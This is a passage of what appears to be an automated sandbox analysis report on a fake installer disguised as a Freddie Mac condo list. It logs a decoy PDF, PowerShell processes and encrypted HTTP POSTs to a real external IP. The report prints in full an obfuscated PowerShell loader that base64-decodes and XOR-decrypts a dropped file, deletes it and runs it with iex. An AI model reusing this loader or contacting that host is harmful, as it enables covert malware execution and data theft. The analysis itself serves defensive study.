f6 13 bf 22 ef 88 2f 44 25 8b 55 50 75 1c 81 72 66 16 90 d1 db 58 92 95 1d 59 17 2b ec 70 e2 8e 86 04 dc 47 7f bc 87 64 cd 31 a1 76 b9 d6 51 0a 12 40 4e f9 22 ef 41 f9 7d c2 c9 47 91 e8 bd cc 2b c2 bb f1 0f 6b 72 4a 87 c0 c2 d5 ab 77 37 80 37 01 fe bb 67 73 e3 fa 06 fb 0f e8 eb 52 65 29 76 1b 0e 25 fb 2e bd 3b 42 13 cf b2 eb 71 16 f5 96 13 cb 0c 2b ea 71 15 24 24 96 ad f8 bd 40 08 66 43 df 41 5f d1 77 88 8e e2 5e 7b 6c ed 38 b9 0f 0d 85 e9 8b 62 0c 71 10 23 d3 af f8 b1 a6 07 88 b2 d0 a4 ac ea 6a 65 70 32 41 4b 24 56 c4 8f ff 29 98 1f b1 09 53 f2 4c fb 54 19 11 9a 52 d9 bd e6 f8 b7 99 d9 6c 78 ec bd b7 a5 d8 25 4a 21 35 12 ec 24 c7 9f 76 f7 d6 b1 79 67 66 b5 71 9a 45 b1 83 ef 75 02 e4 fc 28 89 83 d2 b8 22 e4 2a a1 da b5 cd 09 ee 9c 59 c4 16 5e cc f3 06 72 43 55 f8 22 35 1f 22 c1 b3 65 1f 5e 98 64 11 0e 74 8c 00 d5 26 61 18 f5 5c 6a 90 8e ca b4 ee f7 72 87 c0 bf 71 b2 e5 fc f1 3f ad 58 9a b1 d8 85 f5 99 cd 0e 84 a3 ab b3 85 56 6c a6 b1 9d 54 1c 33 b7 e9 e5 03 50 e0 44 b9 e0 7f 84 98 37 df eb 2f 74 cc 6c c9 ab 14 ef 50 82 13 9b d0 7a 2b 89 b2 3a 57 5c 07 Data Ascii: 8MW33DN%7(+FwJ{eljV(]H/Cb#x{svTfu,M/]X[G+(XZG&il\x7bGj7~P6}yL:`!\= Tzf);}zsM10M+7kx{h^bD]DF&`)t0dRq?Pa&gY ;S@g?OL&(`bGS1~4R8Rb;BAy"FdjP)JtY!P\nOYxhGSD{[UIlivI2"JZS4@Q$V.fK>g#(\|rqg;)mx#}h!OB$u%%.+\|Ds[~P}J^{l~m2G>^s}0dQ`&t/D1'>E 'R,pF/sPfq}b{$T2KVSjA'~5fkzbS6"Z+%B62mTltU s=`'9B+`7'EaPP5\|<% xK&P.AeS\v$Ic2>@tn5R,"fuY\[ R3sCOcSkIkzy}wIAgj]M"/D%UPurfXY+pGd1vQ@N"A}G+krJw77gsRe)v%.;Bq+q$$@fCA_w^{l8bq#jep2AK$V)SLTRlx%J!5$vygfqEu("Y^rCU"5"e^dt&a\jrq?XVlT3PD7/tlPz+:W\

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.3	49759	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:13.174312115 CEST	8101	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180817
Aug 28, 2021 00:07:13.174402952 CEST	8113	OUT	Data Raw: f5 28 cf 33 0d a6 34 af 13 6c d4 f9 ac 3d b2 5e 2e 29 fc 64 dc 7b 8e d5 75 a6 b1 ae c0 5f 2e 05 60 7f 5d ce ba 73 d8 07 68 09 e6 9e 82 a4 7a d2 bc 49 b0 06 1b c0 9e 7b 99 f8 bc 66 f4 84 ee b2 3f d0 9a 2d de e2 a3 ba 4f f5 fa d3 93 ee 54 d0 2d dd Data Ascii: (34l=^.)d{u_.`]shzI{f?-OT-w)6s5`M$:wL_r:Q0J-?%[,yL "6!</E-sq8UY,l}90K

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49723	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:45.531610012 CEST	6404	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 605 Connection: Keep-Alive
Aug 28, 2021 00:06:45.611437082 CEST	6405	OUT	Data Raw: 84 bc 0b 87 55 b7 38 de eb de ad fa 2e 5d cd 8b 09 fb 3c 9d bf 7e 2c 87 3f 3a f3 bd 9f df 99 28 bc 47 a5 1c 24 61 59 4e 95 0a fb c5 52 db 02 bd 87 37 04 f2 97 94 ed 07 91 83 49 1c c3 79 3f 0d 45 86 3e e6 b7 b2 68 a7 a3 ec 09 b6 81 66 35 62 38 36 Data Ascii: U8.]<~,?:(G$aYNR7Iy?E>hf5b867i)X=\P8+OC0(gch0bV!_Q3YGLF"^;Hynv[g<Cm&krU#BT4,r\|J{=j
Aug 28, 2021 00:06:45.885515928 CEST	6407	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 155 Connection: keep-alive Data Raw: 21 f7 9b dc bc 3f fd 5d 83 8f 58 f4 bd 4e 2d ce 7b cd 5c 79 b7 ea 9c e8 e9 0d 67 4d aa a8 72 80 92 86 c6 98 97 f4 33 6e d9 d7 ae a6 f5 50 fd 27 f8 b5 de 1a 7f c4 56 96 6f 17 d7 f9 03 89 9b b9 9c 12 01 7a 83 79 4a 0a 1d 1b f0 39 9d 5f 83 d1 f2 02 b6 80 bc 52 96 0b 9e 89 66 6e a9 42 94 46 94 23 3d bd 66 12 43 b9 69 14 28 fa 67 75 99 e9 77 0a 57 a3 fb c5 c0 ab 12 be 00 08 56 6c d1 9b 76 47 78 70 ac d3 f2 19 cb 68 b5 d1 84 00 48 9b b1 6f 41 70 19 2b 79 4c e6 80 7f Data Ascii: !?]XN-{\ygMr3nP'VozyJ9_RfnBF#=fCi(guwWVlvGxphHoAp+yL

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.3	49760	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:13.321655035 CEST	8117	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 181073
Aug 28, 2021 00:07:13.322062016 CEST	8129	OUT	Data Raw: bc 32 1c a1 61 8c 77 fb 98 5b 9f 39 d4 6e 20 f0 e5 62 65 1f 23 d8 0e 20 cb c5 5a c5 63 f6 45 bf 4a f7 21 09 0b 2a 6d c9 bf 4a 8e de e2 b7 eb 11 5b 69 01 65 e1 fc d7 e2 25 fa d5 9a 32 b0 98 a1 16 df ee dc 4e 17 e5 bb f3 9b 5f d7 4a 2f 3d 15 d9 4a Data Ascii: 2aw[9n be# ZcEJ!mJ[ie%2N_J/=JkL =TDDpGF53h"Q']e9L'wo PB%ROCN=ua 'loDU9'y!S_Gf^NI/B$?"MN{Z"V
Aug 28, 2021 00:07:13.742988110 CEST	8141	OUT	Data Raw: 3e 48 7e 96 95 8d 17 56 c1 72 48 cb 22 a6 6e 11 3a 30 88 c1 2c 77 b2 11 c7 d5 c8 2a 0e f9 2d 39 98 d0 cf 18 6b ea 56 74 d6 24 46 45 85 da f7 78 6f ed c4 1c 58 1c 88 2f 98 55 a2 13 cc 4e be 8a 63 00 da 4d d5 6b 61 4d ee d3 7d 31 ed 3a 43 7e 05 81 Data Ascii: >H~VrH"n:0,w*-9kVt$FExoX/UNcMkaM}1:C~._v+Yv5]1bwGF>!$EU%0 Ba~ZGaq`~<^_/QS^T5[tC\|F&Z'/6Mv>I;D!>qhI%.&49a{;
Aug 28, 2021 00:07:14.243072033 CEST	8175	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 181073 Data Raw: bc 32 1c a1 61 8c 77 fb 98 5b 9f 39 d4 6e 20 f0 e5 62 65 1f 23 d8 0e 20 cb c5 5a c5 63 f6 45 bf 4a f7 21 09 0b 2a 6d c9 bf 4a 8e de e2 b7 eb 11 5b 69 01 65 e1 fc d7 e2 25 fa d5 9a 32 b0 98 a1 16 df ee dc 4e 17 e5 bb f3 9b 5f d7 4a 2f 3d 15 d9 4a 6b f9 f5 df dc 4c 20 3d e3 0f 54 d2 97 0f b0 ec c8 04 c7 0f c1 44 82 44 70 47 9e 01 99 f4 be c0 bf e7 46 9e aa 35 03 a2 bc 12 33 d6 68 22 04 51 27 5d 65 39 4c ca 87 27 77 b2 6f 96 ac 20 a2 ed 50 92 13 ae c7 13 42 93 01 25 52 b0 11 aa db 4f 43 4e d8 3d 8f 85 75 f3 61 20 27 f7 c5 6c f4 9c 6f 44 87 d4 10 55 88 15 1c d0 39 27 79 d6 16 cb d5 21 53 5f 47 66 5e c9 1e 1e 4e a8 ea 49 cd 94 2f b4 42 cc 24 08 3f ed c4 c3 22 be 4d 4e 7b 8a 0a 5a 22 a5 19 96 56 09 e5 bd b6 f1 07 df 2a d1 04 a3 f6 c3 95 49 a8 ce e0 65 99 82 44 9f 7c ce a1 c3 9e 90 28 28 7c 98 5f 39 e5 65 50 4d e6 e3 9a 4f ba a9 56 b6 f3 bf b1 52 c3 b2 fb d2 c4 46 42 e7 50 43 42 98 aa da 28 5f 65 5d 62 43 7f 93 7e b5 e7 f3 e4 d2 78 ea ce dd de d4 64 c8 9b 8c 73 a0 24 68 fc a4 a2 03 a4 de 81 f6 52 97 5e 6e d2 31 35 47 e9 cf 61 6e 6f 64 73 63 b8 d4 77 5e c2 d8 e8 c1 20 18 96 d8 13 e5 50 06 51 81 99 37 80 70 02 33 94 55 a1 a3 3f b4 f8 98 31 3f 49 ce 68 24 34 78 ae 9b 4f bb 9a 5b 34 05 7f 5c 1e ec ca 3d e2 48 d3 44 c8 6d 38 45 82 6a 1e fc a8 d2 9d 80 9c 2d 4d 21 87 e3 22 46 98 39 22 9c 24 e2 97 0c cd f2 5c 01 fa 24 5a c6 41 6a 1a e3 9d 9d b2 60 67 fe be ef 9f aa b4 fd 27 8e ab 90 4c 9b 21 9e d2 13 2f b4 77 9d 85 78 d2 86 de 1e ca 3e a7 fa 86 c0 35 25 25 a6 6b 24 3f 5d d8 6d 78 c9 7a a5 49 7a 00 c3 99 be be b8 78 a9 ac 00 7b 38 20 3b 78 25 b5 64 9e 00 88 6a 9c 25 ec 7c 4d 60 5b fd 2a 8d c3 2a a2 bf ac 9f 3b 44 5e 0a 07 e0 d2 d5 c5 f9 0a 2a 1d 3b e6 17 8f 2c eb 7b a5 87 74 9b bd 5e e0 5c 64 25 dc 60 84 99 0e 94 96 01 86 5c 03 fe ef 9b 7e f7 84 50 5e a5 b1 03 cd b6 a4 81 5b 39 89 f3 a7 b3 55 39 22 da fa f2 da dd 96 9b 83 32 1c d4 ac 5c a7 11 76 b0 bd ce 8b 01 4f 66 03 ee bf 37 c0 4c b0 75 79 22 de 71 0c bf f8 b4 7e ec d6 f6 78 87 c3 0e 51 f6 c7 6e f5 86 bc 4d dd cd 3a 30 b7 28 3f 35 36 3f df 9c fe 99 60 d7 6a 76 fa 3c c3 c2 a9 13 0b c5 b3 61 19 65 2c e9 b2 35 b6 cc db 5f a4 c8 d2 52 cf 70 96 2b bd 27 bc ed 7e b0 7c 2d ed b1 9d 07 99 00 a0 e9 29 53 36 05 96 ab 37 ab 10 53 d0 d6 dc 38 13 6b 37 48 75 43 77 0f 14 e7 fc 72 5c a6 e3 3b e6 d5 3e 19 3a be 4c 28 e4 ab cf 4c 3c 81 79 82 e1 ac f3 cc b6 9f 78 ba 71 fc 54 e7 a2 1f a8 c9 ec 58 25 7c b8 11 7d 12 ec f8 f1 2d ac 29 e6 1e 8b 84 25 c1 42 69 d0 3f b9 4d 94 ca 2e 05 e5 9b 60 ce 31 06 6d d2 cc 87 b4 92 d8 09 fb 93 b0 5f 40 9a e7 38 cb 1b 03 75 5f a6 59 7c fe 0f 68 c5 31 f8 b9 2a ed 7c 27 27 9f 4c 00 1f 45 91 86 69 e5 1f 54 81 5c d6 a8 6d e1 f3 3b 5c 6c 66 2b 17 9e ed d1 2b 9b 83 cf f2 b7 85 38 c6 12 26 9a 60 e6 18 48 13 a3 d7 93 02 f5 a8 c6 2e 49 ba 8a a1 b5 90 08 fb 2f 78 54 23 de 59 8d ba 99 c2 13 db e8 14 fc 56 c5 f2 c1 5c 84 e8 66 10 7d 53 6a fe e1 c2 6d 63 7b 49 9a 71 1a c1 11 45 ae 89 b6 00 25 ed 8d 89 f4 77 9d dc 5c 05 b8 ee bd aa ae e3 b8 a5 1b cb 82 86 9a a4 f1 c7 94 e4 03 79 97 ce a5 ce d1 e8 df 01 43 94 eb d0 a6 1c 8c 78 34 44 aa fe e6 23 44 86 1e 33 84 c0 b9 51 b0 8d 66 96 e8 85 00 e4 33 09 d1 bf 24 fd 7d f1 ef 63 5f 05 56 0d 1d 2e 75 0f 55 21 71 c6 d3 ed d8 e8 f1 09 e7 3b 63 2b 71 d2 63 70 21 01 8b f5 ee 62 c0 90 8c 1d 67 79 09 73 64 7c d5 6d 63 01 67 af 67 88 ff 0d e3 75 c5 0f 74 f8 d3 b8 6b 95 d1 26 97 fc 33 85 af 1e f1 9e dc 5e 26 1b 05 df 73 05 74 6b 7e 20 9c 11 2d 8e df 69 09 46 b9 7c 3b 2f f9 68 95 20 e5 07 ec 5b cb ff ab 1d 68 66 c7 7c fa f8 61 80 45 f1 aa 2c 36 84 8b eb da 8a 22 80 bd 9c 45 a8 ec 72 5e b1 b0 aa ab 72 83 e4 91 9f bd fb 03 d9 fb c2 7b 60 ee f8 22 c1 5c 2d d5 40 04 ac 44 ca 68 11 da c0 90 10 75 b2 a4 be f3 70 a8 ce 5a e7 84 00 fb 8e 20 e1 15 8a e6 65 d6 4e ee 1f ca e6 b6 32 aa 13 88 5c 9d 26 20 70 fe 5d 66 2a a9 1a 2f 38 7a e1 d4 c1 0f d0 d7 78 6b cb d3 86 03 fd 5e d3 2b d6 c2 86 19 73 Data Ascii: 2aw[9n be# ZcEJ!mJ[ie%2N_J/=JkL =TDDpGF53h"Q']e9L'wo PB%ROCN=ua 'loDU9'y!S_Gf^NI/B$?"MN{Z"VIeD\|((\|_9ePMOVRFBPCB(_e]bC~xds$hR^n15Ganodscw^ PQ7p3U?1?Ih$4xO[4\=HDm8Ej-M!"F9"$\$ZAj`g'L!/wx>5%%k$?]mxzIzx{8 ;x%dj%\|M`[*;D^;,{t^\d%`\~P^[9U9"2\vOf7Luy"q~xQnM:0(?56?`jv<ae,5_Rp+'~\|-)S67S8k7HuCwr\;>:L(L<yxqTX%\|}-)%Bi?M.`1m_@8u_Y\|h1\|''LEiT\m;\lf++8&`H.I/xT#YV\f}Sjmc{IqE%w\yCx4D#D3Qf3$}c_V.uU!q;c+qcp!bgysd\|mcggutk&3^&stk~ -iF\|;/h [hf\|aE,6"Er^r{`"\-@DhupZ eN2\& p]f/8zxk^+s

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49724	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:46.074325085 CEST	6409	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 438 Connection: Keep-Alive
Aug 28, 2021 00:06:46.138494015 CEST	6409	OUT	Data Raw: 8f 31 9c 2f 54 a3 b2 54 24 09 b9 5a 0d 2c ad fc 0c 44 ee 5d 47 14 33 44 15 54 65 59 82 04 41 85 9e 95 44 da 73 d4 e7 56 c4 d7 ac 71 c4 93 83 b5 b6 60 cb 73 f3 41 14 7b fc 59 1b 01 3e 59 d0 21 c6 35 bb 76 e7 d1 89 36 5b 99 97 6f 67 c1 7e 81 cf ae Data Ascii: 1/TT$Z,D]G3DTeYADsVq`sA{Y>Y!5v6[og~#8]lZ<1^ o{s,hL7@"Xyg}<:$obGElkS/\` F}ygLBS!A$pvF9?z`T
Aug 28, 2021 00:06:46.212236881 CEST	6410	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html Content-Length: 193 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49725	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:46.410712957 CEST	6411	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 704

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49726	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:46.598917961 CEST	6413	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 547

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49727	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:46.747426033 CEST	6414	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 290
Aug 28, 2021 00:06:46.815891981 CEST	6415	OUT	Data Raw: 0c b9 a1 5c 9b 90 cc 7c 0b 54 df 52 56 5a 5d be c3 06 f0 86 38 f1 5f 8e 03 55 db 8b d2 32 0d 50 11 00 91 c6 f9 0e d4 6d 86 b8 c8 51 ba 26 ff c3 95 99 6c 81 10 57 52 6c ba 75 f8 ff 60 87 ec 43 27 ab 4e 74 a7 93 13 d4 19 1b ba c5 1d f6 79 68 37 8e Data Ascii: \\|TRVZ]8_U2PmQ&lWRlu`C'Ntyh7D9Do%o\o$_'%_0Qk6"7&bgUI6X#W:K/YN2lKf,H@;'2!-/a&^@v
Aug 28, 2021 00:06:47.337455988 CEST	6419	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 32 Connection: keep-alive Data Raw: 00 66 6e c7 8e 71 86 12 2b 9b cd 83 c6 91 4d 62 dd 7c d0 8f ac 3f f4 8c 90 2e f2 8e 12 d6 02 f3 Data Ascii: fnq+Mb\|?.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49728	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:50.029660940 CEST	6434	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 338 Connection: Keep-Alive
Aug 28, 2021 00:06:50.099925041 CEST	6434	OUT	Data Raw: fa 80 ed 21 5b 62 9c 84 83 7c a7 ad a7 80 3c c2 23 a3 1e a5 41 c1 53 b0 58 c5 95 6e c3 be cc ed 5b 05 f4 c2 cf 5a 4c 01 7a 78 e0 16 41 53 1f c3 a1 d8 0d 98 bc d1 e6 3a 2d 3e c7 94 cc 2e bf c3 af b8 52 a2 8a 79 f2 c7 58 1d 2b c7 df 3e 70 05 a7 00 Data Ascii: ![b\|<#ASXn[ZLzxAS:->.RyX+>pPcQr:c ryCg\|Y*($Bch6%#t)&~4%DNx:&8^f`Vq`Ykx&'vpP2 Lx/_ojb@
Aug 28, 2021 00:06:50.196497917 CEST	6435	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html Content-Length: 193 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.14.2</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Freddie-Mac-Warrantable-Condo-List.exe PID: 3164 Parent PID: 780

General

Start time:	00:04:49
Start date:	28/08/2021
Path:	C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe'
Imagebase:	0x400000
File size:	103560224 bytes
MD5 hash:	AE5B37182059C7733466788212370E71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: Freddie-Mac-Warrantable-Condo-List.tmp PID: 5344 Parent PID: 3164

General

Start time:	00:04:50
Start date:	28/08/2021
Path:	C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp' /SL5='$90236,102634141,825344,C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe'
Imagebase:	0x400000
File size:	3156992 bytes
MD5 hash:	8693B9CFB8B4C466AE12CCDC2FEB46CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 2%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: AcroRd32.exe PID: 4936 Parent PID: 5344

General

Start time:	00:04:53
Start date:	28/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf'
Imagebase:	0x1b0000
File size:	2571312 bytes
MD5 hash:	B969CF0C7B2C443A99034881E8C8740A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: AcroRd32.exe PID: 1488 Parent PID: 4936

General

Start time:	00:04:54
Start date:	28/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf'
Imagebase:	0x1b0000
File size:	2571312 bytes
MD5 hash:	B969CF0C7B2C443A99034881E8C8740A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 5312 Parent PID: 5344

General

Start time:	00:04:55
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 4424 Parent PID: 5344

General

Start time:	00:04:56
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3288 Parent PID: 5312

General

Start time:	00:04:56
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6172 Parent PID: 4424

General

Start time:	00:04:56
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6184 Parent PID: 5344

General

Start time:	00:04:56
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
